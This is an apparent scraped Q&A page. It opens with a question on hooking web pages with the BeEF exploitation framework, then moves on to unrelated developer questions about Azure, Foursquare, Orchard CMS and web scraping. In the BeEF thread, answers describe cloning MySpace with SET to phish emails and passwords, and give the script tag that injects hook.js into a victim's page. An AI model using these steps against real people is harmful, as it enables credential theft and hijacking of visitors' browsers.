How to set a BeEF hook to a page - linux

I need to know how to set a BeEF hook to a page of my liking(an existing web page or a new custom page). I tried sharing the demo page but only works on the hosting machine only. I've looked for tutorials but couldn't find any. Please help!

I'm pretty sure You have to host the hook.html file on a hosting service Then direct the victim there. also need to edit the yml file. I remember back in the myspace days you could get on backtrack_r3,
Load up setoolset and clone myspace.
Then you uploaded that file on a file host service. Make a stupid post with that link in a link shortener. Then tada you had emails and passwords.

Using beef-xss you can generate hook.js.
Supposing that the target navigates the web page target.html, you shall include in that page:
<script src="http://<beef-xss-ip-address>:<beef-xss-port>/hook.js"></script>
Once your target will load target.html it will be hooked by beef-xss tool and you will be able to enumerate it.

Related

How to disable users to go to folders in my directory via the url bar on my website? Is it safe for users to look into my directory like that?

Ive made a website, but anyone can get into the files in the directory of my website. For example if you type "www.mysite/css/stylesheet.css" you get to see all my css code. Now its not a problem that a user can see my css.
I was wondering if it is safe that users can see into my directory like that?
Do you have a login system because if so you can use the session to check if they are logged in. if not you can always just make a session using Session_start();
and then check if they if(!$_SESSION['login_user']){
header("location:../index.php");
exit;} for example. i suggest using a login system for it though this isn't really a css related question. more a php html question.

Azure App Services - login to test page

I'm trying to login to the App Services test page so I can open the help page but I can't seem to find the login credentials anywhere. Any idea how can I log in? I used Mobile Services before where I can find this pretty easily: https://blogs.msdn.microsoft.com/musings_on_alm_and_software_development_processes/2014/10/23/azure-mobile-services-prompts-you-for-a-username-and-password/ but this article seems outdated for App Services.
That is the default configuration Home page. There is the .UseDefaultConfiguration() method invoked in the Startup.MobileApp.cs. The part of that is the AddMobileAppHomeController() which depends on the corresponding Microsoft.Azure.Mobile.Server.Controllers.HomeController reference. You may want to remove that from the configuration and add the configuration and the view that you want to see (i am not sure that MobileAppHomeController page you see can be customized). Reference

Why does the Foursquare API JS not work with HTTPS?

In a system I have to maintain (didn't build it, just inherited it) we have a Foursquare implementation that hasn't been used in quite a while. Trying to revive it failed, because our page is now loaded via HTTPS, which it didn't used to be.
We are using the "Save to Foursquare" button as well as the API request to retrieve the number of Check-ins. I already switched all the JS includes and intent links from http to https and at least now it shows the number and the button correctly.
However, I can't click the button and checking the browser's console I found that it added a script tag to the head of this page which tries to access http://platform.foursquare.com/js/modules/widgets.asyncbundle.js. The browser obviously blocks this, because it's not using HTTPS.
The file we are explicitly loading is https://platform.foursquare.com/js/widgets.js. It seems to me like this script is not reacting correctly to HTTP vs. HTTPS. There is probably a very simple solution to this, so what am I missing?
I don't know if you've tried it yet but the foursquare website says this on the matter:
Change the source of the JavaScript file to https://platform-s.foursquare.com/js/widgets.js
Add {"secure":true} to the global configuration block (window.___fourSq)`
The same link (see below) has all the different ways to call the Save To Foursquare function using its .saveTo() function.
https://developer.foursquare.com/overview/widgets
I hope this information and links helps! Cheers.

How to connect Live Writer to Orchard CMS

I have followed the instructions found here and here. Also:
I am using Orchard Orchard v.1.7.0.0
I am hosting in a Windows Azure Website
I have setup Remote Blog Publishing and XmlRpc.
I have tried the all three domain names that point to the website.
My actual blog name is http://www.muddlingthru.com/we-re-all-just-muddling-thru
Here is an image of my attempt to add the blog.
Windows Live Writer says it "was not able to automatically detect your blog settings." So, I try to do it manually as follows.
Windows Live Writer says, "Invalid Server Response - The response to the blogger.getUsersBlogs method received from the blog server was invalid."
I have already setup Remote Blog Publishing and XmlRpc as follows.
Is there anything else that I need to do? For instance, when Windows Live Writer asked for the "Remote posting web address for your blog," it has a template like this:
http://<hostname>/<mw-script>
That I fill in like this:
http://www.muddlingthru.com/we-re-all-just-muddling-thru
I suspect I might have the incorrect remote posting web address.
The blog account must be the url of your blog, not of a blog post.
It will then detect special metas that indicates the /XmlRpc url that implements MetaWeblog API.
You can also configure it manually choosing Metaweblog provider.
I had the same problem, then I disabled the HTML minifier and it worked...
I just installed OpenLive Writer and tried to connect to my Orchard blog and ran into the same problem.
After playing with it a few minutes, I opened the blog page and simply copied and pasted the URL into the Web Address of Your Blog text box.
Bingo, it worked. Only difference, no ending /.

Automatically saving web pages requiring login/HTTPS

I'm trying to automate some datascraping from a website. However, because the user has to go through a login screen a wget cronjob won't work, and because I need to make an HTTPS request, a simple Perl script won't work either. I've tried looking at the "DejaClick" addon for Firefox to simply replay a series of browser events (logging into the website, navigating to where the interesting data is, downloading the page, etc.), but the addon's developers for some reason didn't include saving pages as a feature.
Is there any quick way of accomplishing what I'm trying to do here?
A while back I used mechanize wwwsearch.sourceforge.net/mechanize and found it very helpful. It supports urllib2 so it should also work with HTTPS requests as I read now. So my comment above could hopefully prove wrong.
You can record your action with IRobotSoft web scraper. See demo here: http://irobotsoft.com/help/
Then use saveFile(filename, TargetPage) function to save the target page.

Resources